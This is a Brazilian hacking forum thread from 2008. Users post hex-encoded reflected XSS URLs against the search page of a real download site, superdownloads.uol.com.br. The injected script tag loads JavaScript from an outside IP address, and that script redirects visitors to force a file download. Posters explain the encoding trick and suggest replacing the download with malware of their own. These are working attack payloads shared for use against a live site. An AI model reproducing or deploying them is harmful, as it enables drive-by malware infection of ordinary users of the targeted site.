Title: www.superdownloads.com.br XSS
Post by: Mateus on 26 de June , 2008, 06:39:31 PM
Post by: Mateus on 26 de June , 2008, 06:39:31 PM
http://superdownloads.uol.com.br/busca/ ... 74_3E.html (http://superdownloads.uol.com.br/busca/_22_3E_3C_73_63_72_69_70_74_20_73_72_63_3D_22_68_74_74_70_3A_2F_2F_32_31_33_2E_33_2E_37_2E_31_31_31_2F_31_2E_6A_73_22_3E_3C_2F_73_63_72_69_70_74_3E.html)
Title: Re: www.superdownloads.com.br XSS
Post by: Wuefez on 26 de June , 2008, 06:55:11 PM
Post by: Wuefez on 26 de June , 2008, 06:55:11 PM
Explica mais o Zé Bunda.
Title: Re: www.superdownloads.com.br XSS
Post by: vaikarai on 26 de June , 2008, 07:34:25 PM
Post by: vaikarai on 26 de June , 2008, 07:34:25 PM
Quote from: "Wuefez"Explica mais o Zé Bunda.
ele so transformo o string ">
em Hex
que deu esse rezutado:
22 3E 3C 73 63 72 69 70 74 20 73 72 63 3D 22 68 74 74 70 3A 2F 2F 32 31 33 2E 33 2E 37 2E 31 31 31 2F 31 2E 6A 73 22 3E 3C 2F 73 63 72 69 70 74 3E
e coloco os _22_3E_ e assim por diante..
Title: Re: www.superdownloads.com.br XSS
Post by: vaikarai on 26 de June , 2008, 07:37:45 PM
Post by: vaikarai on 26 de June , 2008, 07:37:45 PM
Ops esquecie de finalizar,
E dentro do http://213.3.7.111/1.js (http://213.3.7.111/1.js) tem esse pequeno comando.
location.replace('http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe');
onde faz baixar o putty.exe
^^
E dentro do http://213.3.7.111/1.js (http://213.3.7.111/1.js) tem esse pequeno comando.
location.replace('http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe');
onde faz baixar o putty.exe
^^
Title: Re: www.superdownloads.com.br XSS
Post by: saint on 26 de June , 2008, 10:00:25 PM
Post by: saint on 26 de June , 2008, 10:00:25 PM
e esse putty é o que, programa.........o que é
Title: Re: www.superdownloads.com.br XSS
Post by: Mateus on 26 de June , 2008, 10:28:58 PM
Post by: Mateus on 26 de June , 2008, 10:28:58 PM
o putty no caso é o próprio putty mas poderia ser um malware qualquer
Title: Re: www.superdownloads.com.br XSS
Post by: rog on 27 de June , 2008, 07:20:39 AM
Post by: rog on 27 de June , 2008, 07:20:39 AM
muito bom memo
esses dias o site da microsoft tinha uma falha parecida
rog
esses dias o site da microsoft tinha uma falha parecida
rog
Title: Re: www.superdownloads.com.br XSS
Post by: blackwinner on 04 de July , 2008, 09:36:12 PM
Post by: blackwinner on 04 de July , 2008, 09:36:12 PM
É, seria interessante trocar o link do download pelo link do seu arquivo. 
Title: Re: www.superdownloads.com.br XSS
Post by: Mateus on 13 de July , 2008, 03:20:45 AM
Post by: Mateus on 13 de July , 2008, 03:20:45 AM
updated com uma técnica nova que eu aprendi =D
http://superdownloads.uol.com.br/busca/_22_3E_3C_73_63_72_69_70_74_20_73_72_63_3D_22_68_74_74_70_3A_2F_2F_32_31_33_2E_33_2E_37_2E_31_31_31_2F_31_2F_31_2E_6A_73_22_3E_3C_2F_73_63_72_69_70_74_3E.html (//http://superdownloads.uol.com.br/busca/_22_3E_3C_73_63_72_69_70_74_20_73_72_63_3D_22_68_74_74_70_3A_2F_2F_32_31_33_2E_33_2E_37_2E_31_31_31_2F_31_2F_31_2E_6A_73_22_3E_3C_2F_73_63_72_69_70_74_3E.html)
http://superdownloads.uol.com.br/busca/_22_3E_3C_73_63_72_69_70_74_20_73_72_63_3D_22_68_74_74_70_3A_2F_2F_32_31_33_2E_33_2E_37_2E_31_31_31_2F_31_2F_31_2E_6A_73_22_3E_3C_2F_73_63_72_69_70_74_3E.html (//http://superdownloads.uol.com.br/busca/_22_3E_3C_73_63_72_69_70_74_20_73_72_63_3D_22_68_74_74_70_3A_2F_2F_32_31_33_2E_33_2E_37_2E_31_31_31_2F_31_2F_31_2E_6A_73_22_3E_3C_2F_73_63_72_69_70_74_3E.html)
Title: Re: www.superdownloads.com.br XSS
Post by: L3m4rk on 15 de July , 2008, 12:51:53 AM
Post by: L3m4rk on 15 de July , 2008, 12:51:53 AM
Mateus
Como transformar
em HEX?
Como transformar
em HEX?
Title: Re: www.superdownloads.com.br XSS
Post by: Mateus on 15 de July , 2008, 09:23:31 AM
Post by: Mateus on 15 de July , 2008, 09:23:31 AM
eu poderia fazer um calculo gigante como bfox gosta mas prefiro de uma maneira mais inteligente.
http://ha.ckers.org/xss.html (http://ha.ckers.org/xss.html) tá lá no fundo =D
depois é só usar o notepad para substituir os % por
http://ha.ckers.org/xss.html (http://ha.ckers.org/xss.html) tá lá no fundo =D
depois é só usar o notepad para substituir os % por